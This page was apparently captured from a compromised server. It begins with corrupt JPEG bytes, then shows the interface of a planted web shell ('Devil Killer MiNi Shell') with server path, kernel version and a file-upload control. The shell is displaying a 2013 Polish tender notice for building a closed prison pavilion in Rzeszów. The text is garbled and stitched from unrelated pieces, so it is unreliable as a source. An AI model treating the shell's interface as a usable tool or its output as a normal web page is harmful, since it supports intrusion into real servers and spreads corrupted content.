JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130417/152394-N-2013.html

<p class="kh_header"><b>Rzeszów: Budowa pawilonu penitencjarnego typu zamkniętego (wraz z polami spacerowymi) w Zakładzie Karnym w Rzeszowie oraz przyłączy infrastruktury technicznej wraz z wygrodzeniem sektorowym.</b><br>
<b>Numer ogłoszenia: 152394 - 2013; data zamieszczenia: 17.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rzeszowie , ul. Załęska 76, 35-322 Rzeszów, woj. podkarpackie, tel. 017 8580700, faks 0-17 8535420.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa pawilonu penitencjarnego typu zamkniętego (wraz z polami spacerowymi) w Zakładzie Karnym w Rzeszowie oraz przyłączy infrastruktury technicznej wraz z wygrodzeniem sektorowym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa pawilonu penitencjarnego typu zamkniętego (wraz z polami spacerowymi) w Zakładzie Karnym w Rzeszowie oraz przyłączy infrastruktury technicznej wraz z wygrodzeniem sektorowym. Przedmiotem zamówienia jest wykonanie wszystkich robót budowlanych wraz z uzyskaniem pozwolenia na użytkowanie w ramach inwestycji pn. Budowa pawilonu penitencjarnego typu zamkniętego (wraz z polami spacerowymi) w Zakładzie Karnym w Rzeszowie oraz przyłączy infrastruktury technicznej wraz z wygrodzeniem sektorowym. Rodzaj zamówienia: roboty budowlane. Nazwa i kod według Wspólnego Słownika Zamówień CPV: Roboty w zakresie burzenia i rozbiórki obiektów budowlanych;  roboty ziemne - 45110000- 1, Roboty budowlane w zakresie budynków więziennych  - 45216113- 9, Wznoszenie ogrodzeń - 45342000- 6, Roboty konstrukcyjne z wykorzystaniem stali - 45223210- 1, Konstrukcje z betonu zbrojonego - 45223500- 1, Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty - 45261000- 4, Roboty murarskie - 45262520- 2, Ściany nośne - 45262620- 3, Roboty w zakresie okładziny tynkowej - 45324000- 4, Roboty w zakresie stolarki budowlanej  - 45421000- 4, Instalowanie wyrobów metalowych - 45421160- 3, Pokrywanie podłóg - 45432130- 4, Malowanie - 45442110- 1, Roboty budowlane wykończeniowe, pozostałe - 45450000- 6, Roboty instalacyjne elektryczne - 45310000- 3, Instalowanie infrastruktury okablowania - 45314300- 4, Roboty instalacyjne elektryczne, instalowanie systemu Telewizji dozorowej - 45310000- 3, Instalacja telewizji kablowej - 45312000- 7, Instalowanie pożarowych systemów alarmowych - 45312100- 8. Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
Przedmiotem zamówienia jest wykonanie wszystkich robót budowlanych wraz z uzyskaniem pozwolenia na użytkowanie w ramach inwestycji pn. Budowa pawilonu penitencjarnego typu zamkniętego (wraz z polami spacerowymi) w Zakładzie Karnym w Rzeszowie oraz przyłączy infrastruktury technicznej wraz z wygrodzeniem sektorowym. Inwestycja realizowana będzie na terenie nieruchomości nr ewidencyjny gruntów 270/8, obręb 220, będącej w trwałym zarządzie Zakładu Karnego w Rzeszowie  ul. Załęska. Przedmiotowy obiekt będzie pełnił funkcję budynku zakwaterowania dla 258 osadzonych. Będą oni zgrupowani na trzech oddziałach  zlokalizowanych  na parterze i dwóch piętrach. Na każdym oddziale przewidziano 20 cel czteroosobowych i 2 cele jednoosobowe. Ponadto na parterze zaprojektowano celę dwuosobową przeznaczoną do osadzenia osoby niepełnosprawnej, na piętrach dodatkowo przewidziano po dwie cele jednoosobowe izolacyjne i po jednej celi trzyosobowej. Na każdym oddziale zaprojektowano dyżurkę oddziałowego, zespół pomieszczeń umywalni, pokój wychowawcy, pokój psychologa, świetlicę, pokój przesłuchań, pokoje przeszukań, punkt wydawania leków, punkt biblioteczny, pomieszczenia gospodarcze, pom. socjalne i WC funkcjonariuszy. Oprócz tego zaprojektowano na parterze celę zabezpieczającą. We wszystkich celach czteroosobowych wydzielono kącik sanitarny z umywalką i miską sedesową, w celach jednoosobowych sedes i umywalka bez dodatkowego wydzielania. Dla potrzeb komunikacji pionowej przewidziano dwie klatki schodowe: jedną główną, oraz drugą przeznaczoną do wyjścia na pola spacerowe. W części nieużytkowej poddasza, zlokalizowanej na obwodzie budynku nad głównymi pionowymi kanałami instalacyjnymi, przewidziano prowadzenie instalacji sanitarnych, elektrycznych i teletechnicznych. Aktualnie powyższa inwestycja została zrealizowana częściowo, tj. wykonane zostały roboty stanu zerowego tj. wykopy, ławy fundamentowe, ściany fundamentowe wraz z izolacją pionową i zasypkami. Szczegółowy stan istniejących robót oraz niezbędne do wykonania przez Wykonawcę roboty adaptacyjne określa Protokół Zaawansowania Inwestycji, który stanowi załącznik nr 12 do SIWZ. Instalacje: Instalacja wodno-kanalizacyjna; Instalacja centralnego ogrzewania; Instalacja wentylacji mechanicznej; Instalacja klimatyzacji; Instalacja elektryczna oświetleniowa i gniazd wtykowych; Instalacja siłowa w pomieszczeniach technicznych; Instalacja sygnalizacji alarmu pożarowego (SAP); Instalacja antywłamaniowa, monitoringu CCTV; Instalacja zapobiegania powstawaniu pożaru; Instalacja zintegrowanego systemu bezpieczeństwa; Instalacja sieci strukturalnej IT; Instalacja sieci teletechnicznej;
Instalacja odgromowa. Zagospodarowanie terenu: - przyłącza: energetyczne, wody, kanalizacji deszczowej, kanalizacji sanitarnej,  ciepłownicze, teletechniczne; - drogi, chodniki, wjazdy, bramy wjazdowe, parkingi; - elementy małej architektury i zieleni urządzonej. Wyposażenie: - wyposażenie stałe określone dokumentacją projektową.
- wyposażenie ruchome wg zał. nr 13 do SIWZ nie jest objęte niniejszym postępowaniem.
Dane techniczne budynku: - powierzchnia zabudowy, - 945,00 m2, - powierzchnia całkowita- 2800,00 m2, - pow. netto / użytkowa / ruchu - 2241,50 m2   / 1495,90 m2  / 745,60 m2,
w tym parteru - 804,40 m2  /  500,70 m2  / 303,70 m2, I piętra - 719,60 m2 / 488,50 m2  / 231,10 m2, II pietra - 717,50 m2  /  506,70 m2  / 210,80 m2, - kubatura -  9700,00 m3,
- ilość oddziałów - 3, - ilość osadzonych - 258, - ilość cel - 73..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.21.61.13-9, 45.34.20.00-6, 45.22.32.10-1, 45.22.35.00-1, 45.26.10.00-4, 45.26.25.20-2, 45.26.26.20-3, 45.32.40.00-4, 45.42.10.00-4, 45.42.11.60-3, 45.43.21.30-4, 45.44.21.10-1, 45.45.00.00-6, 45.31.00.00-3, 45.31.43.00-4, 45.31.00.00-3, 45.31.20.00-7, 45.31.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o zamówienie publiczne oferta musi zostać zabezpieczona wadium w kwocie 360 000,00 zł (słownie: trzysta sześćdziesiąt tysięcy złotych 00/100).
Szczegółowe wymagania dotyczące wadium podano w pkt. 12 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Koncesję MSWiA w zakresie ochrony osób i mienia - zgodnie z ustawą z dnia 22 sierpnia 1997 r. o  ochronie osób i mienia (t. j. Dz. U. z  2005r. nr 145,  poz. 1221 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy trzy zamówienia, w tym co najmniej: a) jedno zamówienie o technologii wykonania budynku i stopniu złożoności podobnym do przedmiotu niniejszego zamówienia: polegające na wykonaniu w technologii żelbetowej (ściany zewnętrzne i wewnętrzne konstrukcyjne oraz stropy między kondygnacyjne żelbetowe) z wykorzystaniem przestawnych deskowań systemowych przy realizacji robót budowlanych budynku wielokondygnacyjnego o kubaturze min. 9 000 m3 i powierzchni zabudowy min. 900 m2, wraz z infrastrukturą towarzyszącą, o wartości zamówienia min. 7 000 000 PLN; b) jedno zamówienie polegające na realizacji robót budowlanych przy budowie lub przebudowie budynku użyteczności publicznej wraz infrastrukturą towarzyszącą, w ramach którego w budynku wykonano zintegrowany system bezpieczeństwa zawierający przynajmniej, SSWiN, kontrolę dostępu,  SAP oraz system CCTV, o wartości zamówienia min. 7 000 000 PLN; c) jedno zamówienie polegające na realizacji robót budowlanych przy budowie lub przebudowie budynku użyteczności publicznej na terenie zamkniętym, zawierającego instalacje systemów zabezpieczeń, objętym ścisłą kontrolą dostępu w tym ewidencjonowanym dostępie przepustkowym. 2. wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy dwa zamówienia polegające na instalacji systemów bezpieczeństwa zawierających zintegrowany system zarządzania bezpieczeństwem dla obiektów o podwyższonych wymaganiach, określonych w art. 5 Ustawy o Ochronie Osób i Mienia z dnia 22 sierpnia 1997 roku, tekst jednolity z dnia 26 lipca 2005 roku (Dz. U. Nr 145, poz. 1221) wraz z późniejszymi zmianami lub dla obiektów o podwyższonych wymaganiach bezpieczeństwa takich jak zakłady karne, jednostki wojskowe i siedziby innych służb mundurowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do realizacji zamówienia będą dysponować wymienionymi pełnosprawnymi    narzędziami, urządzeniami i wyposażeniem:- Żuraw samojezdny lub wieżowy o parametrach umożliwiających operowanie nim w obrębie ogrodzenia;- Samochód ciężarowy o min. dopuszczalnej masie całkowitej pojazdu: 3500 kg;- Minikoparka gąsienicowa z minimalnym osprzętem: wiertnica, młot hydrauliczny, łyżka do kopania, łyżka do skarpowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do realizacji zamówienia będą dysponować następującymi osobami:- Kierownik budowy z uprawnieniami do kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń posiadającym minimum 5-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie (kierowanie lub nadzorowanie), w tym  w kierowaniu lub nadzorowaniu co najmniej 3 realizacji robót konstrukcyjno-budowlanych, w tym co  najmniej 1 o wartości co najmniej 7 mln zł brutto oraz co najmniej jednej prowadzonej na terenie o podwyższonych wymogach bezpieczeństwa objętym ścisłą kontrolą dostępu. Aktualne zaświadczenie  o przynależności do Okręgowej Izby Inżynierów Budownictwa ww. specjalisty, Wykonawca zobowiązany będzie przedstawić przed podpisaniem umowy,- Kierownik robót z uprawnieniami do kierowania robotami w specjalności drogowej  bez ograniczeń posiadającym minimum 5-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie (kierowanie lub nadzorowanie), w tym w kierowaniu lub nadzorowaniu co najmniej 3 realizacji robót drogowych, w tym co  najmniej  jednej prowadzonej na terenie o podwyższonych wymogach bezpieczeństwa objętym ścisłą kontrolą dostępu. Aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa ww. specjalisty, Wykonawca zobowiązany będzie przedstawić przed podpisaniem umowy,- Kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych, posiadającym 5-letnie doświadczenie w pełnieniu samodzielnych funkcji w budownictwie (kierowanie lub nadzorowanie), posiadający doświadczenie w kierowaniu lub nadzorowaniu co najmniej 3 robót budowlanych polegających na wykonaniu instalacji w budynkach kubaturowych oraz co najmniej jednej prowadzonej na terenie o podwyższonych wymogach bezpieczeństwa objętym ścisłą kontrolą dostępu. Aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa ww. specjalisty,Wykonawca zobowiązany będzie przedstawić przed podpisaniem umowy,- Kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych posiadającym 5-letnie doświadczenie w pełnieniu samodzielnych funkcji  w budownictwie (kierowanie lub nadzorowanie), z co najmniej 5 letnim doświadczeniem  w kierowaniu lub nadzorowaniu robót branży elektrycznej (liczone od dnia uzyskania uprawnień), w tym w nadzorowaniu co najmniej 3 robót budowlanych z ostatnich 3 lat polegających na wykonaniu lub przebudowie instalacji elektrycznych, w tym co najmniej jednej budowie lub przebudowie instalacji elektrycznej systemów zabezpieczeń technicznych  prowadzonej na terenie o podwyższonych wymaganiach bezpieczeństwa objętym ścisłą kontrolą dostępu, oraz co najmniej jednej polegającej na budowie lub przebudowie zintegrowanego systemu zabezpieczeń w obiekcie kubaturowym w co najmniej jednej inwestycji prowadzonej na terenie o podwyższonych wymogach bezpieczeństwa objętym ścisłą kontrolą dostępu, posiadającym licencję pracownika zabezpieczenia technicznego II stopnia, zgodnie z art. 3 pkt. 2 i art. 29 ust. 1 ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (t. j. Dz. U. z  2005r. nr 145,  poz. 1221 z późn. zm.), posiadającym poświadczenie bezpieczeństwa na podstawie art. 28 pkt 1 ustawy z dnia 5 sierpnia 2010r. o ochronie informacji niejawnych w zakresie dostępu do informacji niejawnych oznaczonych klauzulą co najmniej poufne. Aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa ww. specjalisty,Wykonawca zobowiązany będzie przedstawić przed podpisaniem umowy,- Kierownik robót posiadającym uprawnienia do instalowania systemów zabezpieczeń technicznych klas 1 - 4, z co najmniej 5 letnim doświadczeniem  w  kierowaniu lub nadzorowaniu robót systemów zabezpieczeń (liczone od dnia uzyskania uprawnień lub licencji), w tym w nadzorowaniu co najmniej 3 robót budowlanych polegających na wykonaniu lub przebudowie instalacji zabezpieczeń, w tym co najmniej jednej budowie lub przebudowie instalacji elektrycznej systemów zabezpieczeń technicznych stopni 1-4 prowadzonej na terenie o podwyższonych wymaganiach bezpieczeństwa objętym ścisłą kontrolą dostępu, oraz co najmniej jednej polegającej na budowie lub przebudowie zintegrowanego systemu zabezpieczeń w obiekcie kubaturowym w co najmniej jednej inwestycji  prowadzonej na terenie o podwyższonych wymogach bezpieczeństwa objętym ścisłą kontrolą dostępu, posiadającym licencję pracownika zabezpieczenia technicznego II stopnia, zgodnie z art. 3 pkt. 2 i art. 29 ust. 1 ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (t. j. Dz. U. z  2005r. nr 145,  poz. 1221 z późn. zm.), posiadającym poświadczenie bezpieczeństwa na podstawie art. 28 pkt 1 ustawy z dnia 5 sierpnia 2010 o ochronie informacji niejawnych  w zakresie dostępu do informacji niejawnych oznaczonych klauzulą co najmniej poufne.- Specjalista ds. zabezpieczeń technicznych (dwie osoby) posiadające licencję pracownika zabezpieczenia technicznego II stopnia, zgodnie z art. 3 pkt. 2 i art. 29 ust. 1 ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia  (t. j. Dz. U. z  2005r. nr 145,  poz. 1221 z późn. zm.),- Specjalista ds. eksploatacji urządzeń, instalacji i sieci posiadającą zaświadczenie kwalifikacyjne E - wydane na podstawie Rozporządzenia Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003r. Nr 89, poz. 828 z późn. zm.)- Specjalista ds. eksploatacji urządzeń, instalacji i sieci oraz co najmniej jedną osobę posiadającą zaświadczenie kwalifikacyjne D - wydane na podstawie Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003r. Nr 89, poz. 828 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) osiągnęli w każdym roku obrotowym z ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, roczne przychody netto ze sprzedaży w wysokości co najmniej 7 000 000 zł (słownie: siedem milionów 00/100 złotych), b)posiadają zgromadzone własne środki finansowe lub posiadają zdolność kredytową w kwocie nie mniejszej niż 5 000 000 zł (słownie: pięć milionów 00/100 złotych), c) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 10 000 000 zł (słownie: dziesięć milionów 00/100 złotych), d)uzyskał w latach 2010 oraz 2011 wskaźnik płynności szybkiej WPS większy lub równy 1.2 obliczany wg wzoru: WPS = (aktywa obrotowe - zapasy -  krótkoterminowe rozliczenia okresowe) / (zobowiązania krótkoterminowe).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

